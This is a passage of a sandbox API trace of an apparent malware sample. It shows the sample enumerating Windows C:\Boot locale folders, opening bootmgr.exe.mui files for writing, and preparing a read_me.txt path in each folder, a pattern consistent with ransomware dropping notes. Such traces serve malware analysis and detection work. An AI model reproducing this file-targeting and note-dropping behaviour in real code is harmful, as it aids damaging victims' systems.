pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned 33 [0075.042] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.042] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.043] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.043] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\read_me.txt") returned 29 [0075.043] GetProcessHeap () returned 0x4f10000 [0075.043] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.043] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 19 [0075.043] GetProcessHeap () returned 0x4f10000 [0075.043] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.045] GetProcessHeap () returned 0x4f10000 [0075.045] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.045] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\*") returned 19 [0075.045] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ru-RU\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.046] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\.") returned 19 [0075.046] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.046] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\..") returned 20 [0075.046] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.046] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 33 [0075.046] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.046] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.046] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.046] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU\\read_me.txt") returned 29 [0075.046] GetProcessHeap () returned 0x4f10000 [0075.046] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.046] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 20 [0075.046] GetProcessHeap () returned 0x4f10000 [0075.046] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.048] GetProcessHeap () returned 0x4f10000 [0075.048] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.048] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\*") returned 19 [0075.049] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sv-SE\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.049] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\.") returned 19 [0075.049] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.049] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\..") returned 20 [0075.049] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.049] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned 33 [0075.049] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.050] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.050] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.050] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE\\read_me.txt") returned 29 [0075.050] GetProcessHeap () returned 0x4f10000 [0075.050] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.050] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 21 [0075.050] GetProcessHeap () returned 0x4f10000 [0075.050] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.052] GetProcessHeap () returned 0x4f10000 [0075.052] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.052] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\*") returned 19 [0075.052] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\tr-TR\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.053] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\.") returned 19 [0075.053] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.053] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\..") returned 20 [0075.053] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.053] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui") returned 33 [0075.053] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.053] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.053] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.053] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR\\read_me.txt") returned 29 [0075.053] GetProcessHeap () returned 0x4f10000 [0075.053] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.053] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 22 [0075.053] GetProcessHeap () returned 0x4f10000 [0075.053] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.056] GetProcessHeap () returned 0x4f10000 [0075.056] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.056] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\*") returned 19 [0075.056] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-CN\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.056] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\.") returned 19 [0075.056] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.056] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\..") returned 20 [0075.056] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.056] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned 33 [0075.056] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.057] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.057] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.057] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN\\read_me.txt") returned 29 [0075.057] GetProcessHeap () returned 0x4f10000 [0075.057] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.057] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 23 [0075.057] GetProcessHeap () returned 0x4f10000 [0075.057] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.060] GetProcessHeap () returned 0x4f10000 [0075.060] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.060] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\*") returned 19 [0075.060] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-HK\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.060] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\.") returned 19 [0075.060] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.060] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\..") returned 20 [0075.060] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.060] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned 33 [0075.060] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.060] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.060] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.060] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK\\read_me.txt") returned 29 [0075.060] GetProcessHeap () returned 0x4f10000 [0075.060] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.060] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 24 [0075.060] GetProcessHeap () returned 0x4f10000 [0075.060] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.063] GetProcessHeap () returned 0x4f10000 [0075.063] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.063] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\*") returned 19 [0075.063] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-TW\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.063] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\.") returned 19 [0075.063] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.063] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\..") returned 20 [0075.063] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.063] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 33 [0075.064] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.064] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.064] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.064] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\read_me.txt") returned 29 [0075.064] GetProcessHeap () returned 0x4f10000 [0075.064] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.064] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 25 [0075.064] GetProcessHeap () returned 0x4f10000 [0075.064] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.070] GetProcessHeap () returned 0x4f10000 [0075.070] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 